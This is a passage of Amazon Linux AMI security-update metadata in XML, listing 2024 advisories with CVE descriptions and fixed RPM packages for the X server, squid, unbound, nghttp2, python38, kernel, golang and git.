NOTE: https://gitlab.freedesktop.org/xorg/xserver/-/commit/26769aa71fcbe0a8403b7fb13b7c9010cc07c3a8
CVE-2024-21885:
Heap buffer overflow in XISendDeviceHierarchyEvent
NOTE: https://lists.x.org/archives/xorg/2024-January/061525.html
NOTE: https://gitlab.freedesktop.org/xorg/xserver/-/commit/4a5e9b1895627d40d26045bd0b7ef3dce503cbd1
CVE-2024-0229:
Reattaching to different master device may lead to out-of-bounds memory access
NOTE: https://lists.x.org/archives/xorg/2024-January/061525.html
NOTE: https://gitlab.freedesktop.org/xorg/xserver/-/commit/ece23be888a93b741aa1209d1dbf64636109d6a5
NOTE: https://gitlab.freedesktop.org/xorg/xserver/-/commit/219c54b8a3337456ce5270ded6a67bcde53553d5
NOTE: https://gitlab.freedesktop.org/xorg/xserver/-/commit/df3c65706eb169d5938df0052059f3e0d5981b74
CVE-2023-6816:
Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer
NOTE: https://lists.x.org/archives/xorg/2024-January/061525.html
NOTE: https://gitlab.freedesktop.org/xorg/xserver/-/commit/9e2ecb2af8302dedc49cb6a63ebe063c58a9e7e3
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6816" title="" id="CVE-2023-6816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0229" title="" id="CVE-2024-0229" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21885" title="" id="CVE-2024-21885" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21886" title="" id="CVE-2024-21886" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-common" version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.56.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.56.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" 
version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.56.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.56.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.56.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.56.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.56.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.56.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.56.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2024-1933</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1933: important priority package update for squid</title><issued date="2024-04-25 16:04:00" /><updated date="2024-04-25 16:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-46846:
Due to chunked decoder lenience Squid is vulnerable to Request/Response smuggling attacks when parsing HTTP/1.1 and ICAP messages.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46846" title="" id="CVE-2023-46846" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="17.55.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.55.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.55.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.55.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.55.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.55.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.55.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.55.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.55.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.55.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.55.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1934</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1934: important priority package update for unbound</title><issued date="2024-05-09 17:43:00" /><updated date="2024-05-15 19:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-33655:
An issue was discovered in some DNS recursive resolvers that allows remote attackers to cause a denial of service using a maliciously designed authority and response amplification.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33655" title="" id="CVE-2024-33655" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="unbound" version="1.6.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-1.6.6-1.6.amzn1.x86_64.rpm</filename></package><package name="unbound-libs" version="1.6.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-libs-1.6.6-1.6.amzn1.x86_64.rpm</filename></package><package name="unbound-devel" version="1.6.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-devel-1.6.6-1.6.amzn1.x86_64.rpm</filename></package><package name="unbound-debuginfo" version="1.6.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-debuginfo-1.6.6-1.6.amzn1.x86_64.rpm</filename></package><package name="unbound-python" version="1.6.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-python-1.6.6-1.6.amzn1.x86_64.rpm</filename></package><package name="unbound-python" version="1.6.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-python-1.6.6-1.6.amzn1.i686.rpm</filename></package><package name="unbound-debuginfo" version="1.6.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-debuginfo-1.6.6-1.6.amzn1.i686.rpm</filename></package><package name="unbound" version="1.6.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-1.6.6-1.6.amzn1.i686.rpm</filename></package><package name="unbound-libs" version="1.6.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-libs-1.6.6-1.6.amzn1.i686.rpm</filename></package><package name="unbound-devel" version="1.6.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-devel-1.6.6-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1935</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1935: important priority package update for nghttp2</title><issued date="2024-05-09 17:43:00" /><updated date="2024-05-15 19:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-28182:
nghttp2 is an implementation of the Hypertext Transfer Protocol version 2 in C. The nghttp2 library prior to version 1.61.0 keeps reading an unbounded number of HTTP/2 CONTINUATION frames even after a stream is reset, in order to keep the HPACK context in sync. This causes excessive CPU usage to decode the HPACK stream. nghttp2 v1.61.0 mitigates this vulnerability by limiting the number of CONTINUATION frames it accepts per stream. There is no workaround for this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28182" title="" id="CVE-2024-28182" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libnghttp2" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-1.33.0-1.1.9.amzn1.x86_64.rpm</filename></package><package name="libnghttp2-devel" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-devel-1.33.0-1.1.9.amzn1.x86_64.rpm</filename></package><package name="nghttp2" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-1.33.0-1.1.9.amzn1.x86_64.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.9.amzn1.x86_64.rpm</filename></package><package name="nghttp2" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-1.33.0-1.1.9.amzn1.i686.rpm</filename></package><package name="libnghttp2-devel" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-devel-1.33.0-1.1.9.amzn1.i686.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.9.amzn1.i686.rpm</filename></package><package name="libnghttp2" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-1.33.0-1.1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1936</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1936: important priority package update for python38</title><issued date="2024-05-09 17:43:00" /><updated date="2024-05-15 19:29:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-6597:
An issue was found in the CPython `tempfile.TemporaryDirectory` class affecting versions 3.12.2, 3.11.8, 3.10.13, 3.9.18, and 3.8.18 and prior.
The tempfile.TemporaryDirectory class would dereference symlinks during cleanup of permissions-related errors. This means users who can run privileged programs are potentially able to modify permissions of files referenced by symlinks in some circumstances.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6597" title="" id="CVE-2023-6597" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python38-debug" version="3.8.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debug-3.8.5-1.11.amzn1.x86_64.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-tools-3.8.5-1.11.amzn1.x86_64.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-test-3.8.5-1.11.amzn1.x86_64.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debuginfo-3.8.5-1.11.amzn1.x86_64.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-libs-3.8.5-1.11.amzn1.x86_64.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-devel-3.8.5-1.11.amzn1.x86_64.rpm</filename></package><package name="python38" version="3.8.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-3.8.5-1.11.amzn1.x86_64.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python38-libs-3.8.5-1.11.amzn1.i686.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debuginfo-3.8.5-1.11.amzn1.i686.rpm</filename></package><package name="python38" version="3.8.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python38-3.8.5-1.11.amzn1.i686.rpm</filename></package><package name="python38-tools" version="3.8.5" 
release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python38-tools-3.8.5-1.11.amzn1.i686.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debug-3.8.5-1.11.amzn1.i686.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python38-devel-3.8.5-1.11.amzn1.i686.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python38-test-3.8.5-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1937</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1937: important priority package update for kernel</title><issued date="2024-05-09 17:43:00" /><updated date="2024-05-15 19:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-52628:
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nftables: exthdr: fix 4-byte stack OOB write
If priv->len is a multiple of 4, then dst[len / 4] can write past
the destination array which leads to stack corruption.
This construct is necessary to clean the remainder of the register
in case ->len is NOT a multiple of the register size, so make it
conditional just like nft_payload.c does.
The bug was added in 4.1 cycle and then copied/inherited when
tcp/sctp and ip option support was added.
Bug reported by Zero Day Initiative project (ZDI-CAN-21950,
ZDI-CAN-21951, ZDI-CAN-21961).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52628" title="" id="CVE-2023-52628" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.343" 
release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.343" release="183.564.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-4.14.343-183.564.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1938</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1938: important priority package update for golang</title><issued date="2024-05-09 17:43:00" /><updated date="2024-05-15 19:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-17596:
Go before 1.12.11 and 1.3.x before 1.13.2 can panic upon an attempt to process network traffic containing an invalid DSA public key. There are several attack scenarios, such as traffic from a client to a server that verifies client certificates.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17596" title="" id="CVE-2019-17596" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang" version="1.13.4" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.13.4-1.57.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.13.4" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.13.4-1.57.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.13.4" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.13.4-1.57.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.13.4" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.13.4-1.57.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.13.4" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.13.4-1.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1939</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1939: important priority package update for 
git</title><issued date="2024-05-23 21:37:00" /><updated date="2024-05-31 18:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-32465:
Git is a revision control system. The Git project recommends avoiding working in untrusted repositories, and instead cloning them first with `git clone --no-local` to obtain a clean copy. Git has specific protections to make that a safe operation even with an untrusted source repository, but vulnerabilities allow those protections to be bypassed. In the context of cloning local repositories owned by other users, this vulnerability has been covered in CVE-2024-32004. But there are circumstances where the fixes for CVE-2024-32004 are not enough: for example, when obtaining a `.zip` file containing a full copy of a Git repository, it should not be trusted by default to be safe, as e.g. hooks could be configured to run within the context of that repository. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. As a workaround, avoid using Git in repositories that have been obtained via archives from untrusted sources.
CVE-2024-32021:
Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, when cloning a local source repository that contains symlinks via the filesystem, Git may create hardlinks to arbitrary user-readable files on the same filesystem as the target repository in the `objects/` directory. Cloning a local repository over the filesystem may create hardlinks to arbitrary user-owned files on the same filesystem in the target Git repository's `objects/` directory. When cloning a repository over the filesystem (without explicitly specifying the `file://` protocol or `--no-local`), the optimizations for local cloning
will be used, which include attempting to hard link the object files instead of copying them. While the code includes checks against symbolic links in the source repository, which were added during the fix for CVE-2022-39253, these checks can still be raced because the hard link operation ultimately follows symlinks. If the object on the filesystem appears as a file during the check, and then a symlink during the operation, this will allow the adversary to bypass the check and create hardlinks in the destination objects directory to arbitrary, user-readable files. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4.
CVE-2024-32020:
Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, local clones may end up hardlinking files into the target repository's object database when source and target repository reside on the same disk. If the source repository is owned by a different user, then those hardlinked files may be rewritten at any point in time by the untrusted user. Cloning local repositories will cause Git to either copy or hardlink files of the source repository into the target repository. This significantly speeds up such local clones compared to doing a "proper" clone and saves both disk space and compute time. When cloning a repository located on the same disk that is owned by a different user than the current user we also end up creating such hardlinks. These files will continue to be owned and controlled by the potentially-untrusted user and can be rewritten by them at will in the future. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4.
CVE-2024-32004:
Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, an attacker can prepare a local repository in such a way that, when cloned, will execute arbitrary code during the operation. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. As a workaround, avoid cloning repositories from untrusted sources.
CVE-2024-32002:
Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, repositories with submodules can be crafted in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a `.git/` directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. If symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. As always, it is best to avoid cloning repositories from untrusted sources.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32002" title="" id="CVE-2024-32002" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32004" title="" id="CVE-2024-32004" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32020" title="" id="CVE-2024-32020" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32021" title="" id="CVE-2024-32021" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32465" title="" id="CVE-2024-32465" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Git" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.38.4" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.38.4-1.81.amzn1.x86_64.rpm</filename></package><package name="git-instaweb" version="2.38.4" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.38.4-1.81.amzn1.x86_64.rpm</filename></package><package name="git-subtree" version="2.38.4" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-subtree-2.38.4-1.81.amzn1.x86_64.rpm</filename></package><package name="git-core" version="2.38.4" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-core-2.38.4-1.81.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.38.4" release="1.81.amzn1" epoch="0" 
arch="noarch"><filename>Packages/git-email-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.38.4" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.38.4-1.81.amzn1.x86_64.rpm</filename></package><package name="git-core-doc" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.38.4" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.38.4-1.81.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git" version="2.38.4" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.38.4-1.81.amzn1.x86_64.rpm</filename></package><package name="git-instaweb" version="2.38.4" release="1.81.amzn1" epoch="0" 
